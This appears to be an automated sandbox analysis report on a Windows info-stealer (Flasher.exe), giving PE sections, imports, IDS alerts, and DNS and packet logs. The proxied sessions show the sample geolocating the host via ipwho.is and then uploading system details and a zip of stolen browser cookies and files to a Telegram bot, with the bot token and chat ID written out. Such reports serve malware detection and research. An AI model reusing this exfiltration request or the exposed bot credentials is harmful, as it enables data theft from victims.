IMAGE_DIRECTORY_ENTRY_DEBUG	0x2f9780	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x2f9800	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2f9640	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x24a000	0x8f0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x248d22	0x248e00	b1bb9279267b50a5043e154ab4ae2346	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x24a000	0xbceae	0xbd000	dac997b2fcb9e6078fc85e4c271d8ede	False	0.49333069816468256	data	5.940580286739089	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x307000	0x6c48	0x6000	03bf1b535e057fc1f9a3226bd561721b	False	0.4155680338541667	data	4.307032103447474	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x30e000	0xe298	0xe400	19a10878ab576b8c43721c2d1609233f	False	0.4992804276315789	data	6.160976868237233	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x31d000	0x2ec4	0x3000	329022e6fb1075d2f3592e2d5db21780	False	0.4141438802083333	data	5.404204931942349	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
api-ms-win-core-synch-l1-2-0.dll	WakeByAddressSingle, WakeByAddressAll, WaitOnAddress
bcryptprimitives.dll	ProcessPrng
kernel32.dll	FormatMessageW, lstrlenW, GetEnvironmentVariableW, GetTempPathW, GetModuleFileNameW, CreateFileW, SetFileInformationByHandle, GetFileInformationByHandleEx, GetFullPathNameW, SetFilePointerEx, FindNextFileW, CreateDirectoryW, FindFirstFileW, QueryPerformanceFrequency, GetTimeZoneInformation, SystemTimeToFileTime, SystemTimeToTzSpecificLocalTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, CompareStringOrdinal, GetSystemDirectoryW, GetWindowsDirectoryW, CreateProcessW, GetFileAttributesW, GetCurrentProcess, DuplicateHandle, InitializeProcThreadAttributeList, UpdateProcThreadAttribute, DeleteProcThreadAttributeList, GetCurrentProcessId, CreateNamedPipeW, CreateThread, WriteFileEx, SleepEx, ReadFileEx, CreateEventW, CancelIo, ReadFile, QueryPerformanceCounter, HeapAlloc, GetProcessHeap, GetCurrentDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, GetProcAddress, LoadLibraryA, CreateMutexA, ReleaseMutex, RtlVirtualUnwind, WideCharToMultiByte, CopyFileExW, PostQueuedCompletionStatus, FileTimeToSystemTime, GetSystemTimeAsFileTime, GetModuleHandleA, WriteConsoleW, MultiByteToWideChar, UnhandledExceptionFilter, GetExitCodeProcess, WaitForSingleObject, GetConsoleMode, GetStdHandle, AddVectoredExceptionHandler, FlushFileBuffers, GetTickCount, MapViewOfFile, CreateFileMappingW, FormatMessageA, GetSystemTime, FreeLibrary, GetFileSize, LockFileEx, LocalFree, UnlockFile, HeapDestroy, HeapCompact, LoadLibraryW, DeleteFileW, DeleteFileA, CreateFileA, FlushViewOfFile, OutputDebugStringW, GetFileAttributesExW, GetFileAttributesA, GetDiskFreeSpaceA, GetTempPathA, Sleep, HeapSize, HeapValidate, UnmapViewOfFile, CreateMutexW, UnlockFileEx, SetEndOfFile, GetFullPathNameA, SetFilePointer, LockFile, OutputDebugStringA, GetDiskFreeSpaceW, WriteFile, HeapCreate, AreFileApisANSI, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, TryEnterCriticalSection, DeleteCriticalSection, GetCurrentThreadId, SetThreadStackGuarantee, SetHandleInformation, GetCurrentThread, SetUnhandledExceptionFilter, TerminateProcess, GetOverlappedResult, GetModuleHandleW, GetFileInformationByHandle, SwitchToThread, SetLastError, GetFinalPathNameByHandleW, WaitForMultipleObjects, GetSystemInfo, GetSystemTimePreciseAsFileTime, GetLastError, GetQueuedCompletionStatusEx, FindClose, CloseHandle, HeapFree, IsProcessorFeaturePresent, InitializeSListHead, IsDebuggerPresent, HeapReAlloc, CreateIoCompletionPort, SetFileCompletionNotificationModes, WaitForSingleObjectEx
oleaut32.dll	SafeArrayGetUBound, SafeArrayAccessData, SysAllocStringLen, SafeArrayDestroy, VariantClear, SysFreeString, SafeArrayUnaccessData, SafeArrayGetLBound
crypt32.dll	CertCloseStore, CertDuplicateCertificateChain, CertAddCertificateContextToStore, CertEnumCertificatesInStore, CertOpenStore, CryptUnprotectData, CertVerifyCertificateChainPolicy, CertFreeCertificateChain, CertGetCertificateChain, CertDuplicateCertificateContext, CertDuplicateStore, CertFreeCertificateContext
ole32.dll	CoInitializeSecurity, CoInitializeEx, CoCreateInstance, CoSetProxyBlanket
advapi32.dll	CheckTokenMembership, RegCloseKey, FreeSid, RegOpenKeyExW, RegQueryValueExW, AllocateAndInitializeSid
user32.dll	EnumDisplayMonitors, EnumDisplaySettingsExW, GetMonitorInfoW
gdi32.dll	DeleteObject, CreateCompatibleDC, CreateCompatibleBitmap, SelectObject, SetStretchBltMode, StretchBlt, CreateDCW, GetDeviceCaps, DeleteDC, GetDIBits, GetObjectW
ntdll.dll	RtlNtStatusToDosError, NtDeviceIoControlFile, NtCreateFile, NtWriteFile, NtReadFile, NtCancelIoFileEx
bcrypt.dll	BCryptGenRandom
ws2_32.dll	getsockopt, closesocket, bind, setsockopt, ioctlsocket, WSAIoctl, freeaddrinfo, connect, getsockname, WSAGetLastError, getpeername, WSASocketW, getaddrinfo, WSASend, WSAStartup, WSACleanup, recv, send, shutdown
secur32.dll	FreeContextBuffer, DeleteSecurityContext, FreeCredentialsHandle, EncryptMessage, AcquireCredentialsHandleA, QueryContextAttributesW, AcceptSecurityContext, InitializeSecurityContextW, DecryptMessage, ApplyControlToken
VCRUNTIME140.dll	memmove, memcmp, memset, __CxxFrameHandler3, strrchr, __current_exception_context, __current_exception, __C_specific_handler, memcpy
api-ms-win-crt-string-l1-1-0.dll	strncmp, strcspn, strcmp, strlen
api-ms-win-crt-heap-l1-1-0.dll	_set_new_mode, realloc, _msize, malloc, free
api-ms-win-crt-utility-l1-1-0.dll	_rotl64, qsort
api-ms-win-crt-time-l1-1-0.dll	_localtime64_s
api-ms-win-crt-math-l1-1-0.dll	log, __setusermatherr, _dclass
api-ms-win-crt-runtime-l1-1-0.dll	_get_initial_narrow_environment, _configure_narrow_argv, _initterm_e, exit, _exit, _set_app_type, _seh_filter_exe, __p___argc, _initialize_narrow_environment, __p___argv, _cexit, _c_exit, _register_thread_local_exe_atexit_callback, _endthreadex, _beginthreadex, _initterm, _initialize_onexit_table, _register_onexit_function, _crt_atexit, terminate
api-ms-win-crt-stdio-l1-1-0.dll	__p__commode, _set_fmode
api-ms-win-crt-locale-l1-1-0.dll	_configthreadlocale

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-27T21:48:09.220898+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.4	49737	149.154.167.220	443	TCP
2024-12-27T21:48:09.220898+0100	2029323	ET MALWARE Possible Generic RAT over Telegram API	1	192.168.2.4	49737	149.154.167.220	443	TCP
2024-12-27T21:48:09.220898+0100	2044524	ET MALWARE Win32/Luca Stealer Sending System Information via Telegram (GET)	1	192.168.2.4	49737	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 21:48:00.938024044 CET	49736	443	192.168.2.4	108.181.61.49
Dec 27, 2024 21:48:00.938062906 CET	443	49736	108.181.61.49	192.168.2.4
Dec 27, 2024 21:48:00.938132048 CET	49736	443	192.168.2.4	108.181.61.49
Dec 27, 2024 21:48:00.949522018 CET	49736	443	192.168.2.4	108.181.61.49
Dec 27, 2024 21:48:00.949532032 CET	443	49736	108.181.61.49	192.168.2.4
Dec 27, 2024 21:48:03.352962017 CET	443	49736	108.181.61.49	192.168.2.4
Dec 27, 2024 21:48:03.353056908 CET	49736	443	192.168.2.4	108.181.61.49
Dec 27, 2024 21:48:03.356683969 CET	49736	443	192.168.2.4	108.181.61.49
Dec 27, 2024 21:48:03.356709957 CET	443	49736	108.181.61.49	192.168.2.4
Dec 27, 2024 21:48:03.357090950 CET	443	49736	108.181.61.49	192.168.2.4
Dec 27, 2024 21:48:03.397682905 CET	49736	443	192.168.2.4	108.181.61.49
Dec 27, 2024 21:48:03.412977934 CET	49736	443	192.168.2.4	108.181.61.49
Dec 27, 2024 21:48:03.455337048 CET	443	49736	108.181.61.49	192.168.2.4
Dec 27, 2024 21:48:04.017157078 CET	443	49736	108.181.61.49	192.168.2.4
Dec 27, 2024 21:48:04.017237902 CET	443	49736	108.181.61.49	192.168.2.4
Dec 27, 2024 21:48:04.017304897 CET	49736	443	192.168.2.4	108.181.61.49
Dec 27, 2024 21:48:04.018726110 CET	49736	443	192.168.2.4	108.181.61.49
Dec 27, 2024 21:48:04.018744946 CET	443	49736	108.181.61.49	192.168.2.4
Dec 27, 2024 21:48:07.791484118 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:07.791541100 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:07.791637897 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:07.791956902 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:07.791976929 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:09.216423035 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:09.216496944 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.218820095 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.218835115 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:09.219079971 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:09.220561028 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.220606089 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:09.220694065 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.220735073 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:09.220833063 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.220899105 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.220901012 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:09.220921993 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:09.220973015 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.220989943 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:09.220999002 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.221009970 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:09.221035004 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.221045017 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:09.221064091 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.221076012 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:09.221154928 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.221168041 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:09.221187115 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.221194983 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:09.221223116 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.221235991 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:09.221313000 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.221323967 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:09.221343040 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.221364975 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.221388102 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.221412897 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.221484900 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.221508980 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.221520901 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.221537113 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.221579075 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.267333031 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:09.267554045 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.267579079 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.267600060 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.267621994 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.267637968 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.267646074 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.267661095 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.267676115 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.267693043 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.315331936 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:09.315458059 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.315480947 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.315510035 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.315531969 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.315541983 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.315558910 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.315577030 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.315584898 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.363339901 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:09.363575935 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.363596916 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.407366037 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:09.447293997 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:09.447376013 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:09.447415113 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.447463036 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.495328903 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:09.495441914 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.543339014 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:09.567001104 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:09.567135096 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.567158937 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:09.567229033 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:09.567270041 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.567290068 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.611331940 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:09.611438036 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.655332088 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:09.688136101 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:09.688242912 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.688263893 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:09.688354015 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:09.688379049 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.688401937 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.688430071 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:09.688448906 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.688474894 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.688551903 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.690058947 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:09.690082073 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:09.690188885 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.690233946 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:09.690342903 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.690361023 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:09.690423965 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:09.690432072 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:09.808027029 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:11.152036905 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:11.154447079 CET	443	49737	149.154.167.220	192.168.2.4
Dec 27, 2024 21:48:11.154512882 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:11.155147076 CET	49737	443	192.168.2.4	149.154.167.220
Dec 27, 2024 21:48:11.155164003 CET	443	49737	149.154.167.220	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 21:48:00.795998096 CET	50867	53	192.168.2.4	1.1.1.1
Dec 27, 2024 21:48:00.934143066 CET	53	50867	1.1.1.1	192.168.2.4
Dec 27, 2024 21:48:07.651525021 CET	52680	53	192.168.2.4	1.1.1.1
Dec 27, 2024 21:48:07.789971113 CET	53	52680	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 27, 2024 21:48:00.795998096 CET	192.168.2.4	1.1.1.1	0x12b9	Standard query (0)	ipwho.is	A (IP address)	IN (0x0001)	false
Dec 27, 2024 21:48:07.651525021 CET	192.168.2.4	1.1.1.1	0x4f2e	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 27, 2024 21:48:00.934143066 CET	1.1.1.1	192.168.2.4	0x12b9	No error (0)	ipwho.is		108.181.61.49	A (IP address)	IN (0x0001)	false
Dec 27, 2024 21:48:07.789971113 CET	1.1.1.1	192.168.2.4	0x4f2e	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ipwho.is

api.telegram.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	108.181.61.49	443	7284	C:\Users\user\Desktop\Flasher.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 20:48:03 UTC	47	OUT	GET / HTTP/1.1 accept: / host: ipwho.is
2024-12-27 20:48:04 UTC	223	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 20:48:03 GMT Content-Type: application/json; charset=utf-8 Transfer-Encoding: chunked Connection: close Server: ipwhois Access-Control-Allow-Headers: * X-Robots-Tag: noindex
2024-12-27 20:48:04 UTC	715	IN	Data Raw: 32 62 66 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 2c 22 74 79 70 65 22 3a 22 49 50 76 34 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 22 4e 59 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 30 2e 37 31 32 37 38 33 37 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 37 34 2e 30 30 35 39 34 31 33 2c 22 Data Ascii: 2bf{"ip":"8.46.123.189","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","region":"New York","region_code":"NY","city":"New York","latitude":40.7127837,"longitude":-74.0059413,"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	149.154.167.220	443	7284	C:\Users\user\Desktop\Flasher.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 20:48:09 UTC	1032	OUT	GET /bot7812312068:AAFyVEsyd0q1cihJMPAZWF_CNZa5o5NgMOA/sendDocument?chat_id=-4662852241&caption=%0A-%20IP%20Info%20-%0A%0AIP:%208.46.123.189%0ACountry:%20United%20States%0ACity:%20New%20York%0APostal:%2010000%0AISP:%20Level%20-%20A3356%0ATimezone:%20-05:00%0A%0A-%20PC%20Info%20-%0A%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0A%20%20%20%20-%20YT3TY%20(1280,%201024)%0AHWID:%205676401068884178%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\Flasher.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%2025%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2018%0ACredit%20Cards:%20%E2%9D%8C&parse_mode=HTML HTTP/1.1 content-type: multipart/form-data; boundary=65630d81a695e841-884032d12ba6fc1d-ddec9f059967c02d-61ea391d86b43416 content-length: 938714 accept: / host: api.telegram.org
2024-12-27 20:48:09 UTC	15352	OUT	Data Raw: 2d 2d 36 35 36 33 30 64 38 31 61 36 39 35 65 38 34 31 2d 38 38 34 30 33 32 64 31 32 62 61 36 66 63 31 64 2d 64 64 65 63 39 66 30 35 39 39 36 37 63 30 32 64 2d 36 31 65 61 33 39 31 64 38 36 62 34 33 34 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 6a 6f 6e 65 73 5b 38 2e 34 36 2e 31 32 33 2e 31 38 39 5d 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 00 00 03 7e 9b 59 b9 3a 30 8b f8 0c 00 00 f8 0c 00 00 1a 00 00 00 63 6f 6f 6b 69 65 73 5f 67 6f 6f 67 6c 65 5f 64 65 66 61 75 6c 74 2e 74 78 74 2e 67 6f 6f 67 6c 65 2e 63 6f Data Ascii: --65630d81a695e841-884032d12ba6fc1d-ddec9f059967c02d-61ea391d86b43416Content-Disposition: form-data; name="document"; filename="user[8.46.123.189].zip"Content-Type: application/zipPK~Y:0cookies_google_default.txt.google.co
2024-12-27 20:48:09 UTC	16384	OUT	Data Raw: 80 22 4e 52 87 81 eb 71 69 87 b5 2d b9 ba d4 58 20 7c 69 06 c2 97 c9 c8 cd 97 42 31 f5 b2 9d c7 0d 32 9e 71 9e 6b 4f c8 e6 e3 cb 1e 50 c7 4d 9f ba 4e df 15 24 17 d0 d4 01 d9 0e 4e fc 82 f1 27 90 3a 61 60 94 25 fd f2 26 18 cf 81 da 81 00 36 c7 35 72 83 ad 7f 8a 49 57 7d 80 e2 ee ec 53 8c 63 86 11 e7 3c e8 b3 6f 18 b6 c8 f1 6b 9b 92 71 52 db 1a af 6e 5e b9 36 49 5d ac 0b 51 ca 40 cd b3 36 f5 d5 8a 31 8e f5 bb 56 ac 37 a0 24 71 92 0a 50 58 e5 41 e3 98 5c ad 2e c2 5c 30 fc 90 3c fb d6 e6 f8 56 ab 71 d6 34 37 d6 de a4 3e d6 ed 93 03 42 aa d6 22 86 ac bd 8c b9 83 61 4b 31 cf 6f ea 39 dc 5c 92 f9 b4 2b 1b 23 c1 c0 2b eb 83 ad de 0b cc da 8d 91 94 ed dd 5c c6 78 1e 6a d7 26 69 83 91 c3 63 e6 18 61 1c 2f 71 92 98 8a cf 05 68 e3 cd a9 0e d4 fc 47 6e ea 8d 15 9f a6 Data Ascii: "NRqi-X \|iB12qkOPMN$N':a`%&65rIW}Sc<okqRn^6I]Q@61V7$qPXA\.\0<Vq47>B"aK1o9\+#+\xj&ica/qhGn
2024-12-27 20:48:09 UTC	16384	OUT	Data Raw: 86 11 d7 18 6d 12 50 26 65 85 ae d3 7a 73 7d 73 02 aa 97 b6 37 56 2e 01 e5 82 19 f7 e1 34 3d 2e 00 c2 f0 a5 5a 2f bf c0 26 e7 93 17 5f 2a 19 b6 36 71 80 ac a8 e7 d5 b9 b2 77 75 69 5e 1f 46 8c f6 26 f1 f3 f9 d1 07 8c ba ab cb aa a1 ad 84 c9 0e a8 63 06 6c ac 40 c5 99 53 82 a1 0b 30 07 10 d6 54 96 3c ff 3c 8e 30 ec f6 0d 43 d6 df d8 c8 0d c8 7d 7e a3 e7 a4 e9 83 6d 7d 71 92 00 eb b6 df 7c 53 bb df 67 40 f5 10 b9 89 93 52 2c db 22 a8 63 d0 fa 55 ea e6 50 07 02 86 1f a8 45 12 cf 4d f3 4b 91 db b4 36 24 76 fd 0b 2c 18 b1 09 a9 fc 5d d3 6b c1 fc ea 40 f5 00 19 b7 be 6e 63 bd 99 57 11 90 d5 bc 1b e7 f9 af 01 86 dd 3c da b5 d9 13 79 fc 8a a7 5f 9f 76 18 f9 cd 09 6c 6a aa 77 2c 8c 7c 0b ce 62 1a 17 b9 b5 6e 5e f1 40 00 e9 89 0d b6 94 dc c1 d6 6e 1c 0c 3d 5d 85 05 Data Ascii: mP&ezs}s7V.4=.Z/&_*6qwui^F&cl@S0T<<0C}~m}q\|Sg@R,"cUPEMK6$v,]k@ncW<y_vljw,\|bn^@n=]
2024-12-27 20:48:09 UTC	16384	OUT	Data Raw: 15 78 f7 bb df bd 7e fd e7 f0 ef ca 2b af 2c f9 ff d4 3f 01 7e c1 fb 5f 1a 4f fe ba 5d 07 80 79 bd e5 c3 cd 9e 33 c5 f3 a2 e3 39 00 fc ee 1c 00 7e db df 38 70 00 b8 c8 dd 3f 80 ba e1 28 ae 97 9e 6b cc d7 e5 1e d7 1f c7 1c 56 5f 57 e3 a0 1c 7e 81 3a c8 3f f4 8d 73 ab c3 b6 17 f0 30 c3 7e 79 5b b4 35 f6 47 0d 2c 83 0f a0 81 75 21 b2 e5 fd a3 03 c7 75 a0 75 36 b6 77 fc 51 f1 e1 f9 bf 18 b5 86 f9 7b cf 17 52 e7 b0 b1 9b ae af 9e a7 ed 72 ef ec f0 bc e7 39 7c e4 fa 88 c3 e6 fb eb 34 00 74 c5 87 5d df ba f3 77 d8 1c d6 dd 44 c3 eb 73 9c 57 1d 0e be 42 f6 a2 f9 87 79 86 b5 cc a1 be 6e 1d da b7 7f c3 cc af 45 83 f7 10 68 f5 8c ed b9 95 b7 d1 26 ec a6 be d7 e5 5b 97 63 d3 ba d6 c5 af b5 0d d6 36 f4 af ab 35 f4 77 79 5c 7f 1c b7 6d 7d 47 39 00 1c d7 ee 3d 76 0e ed Data Ascii: 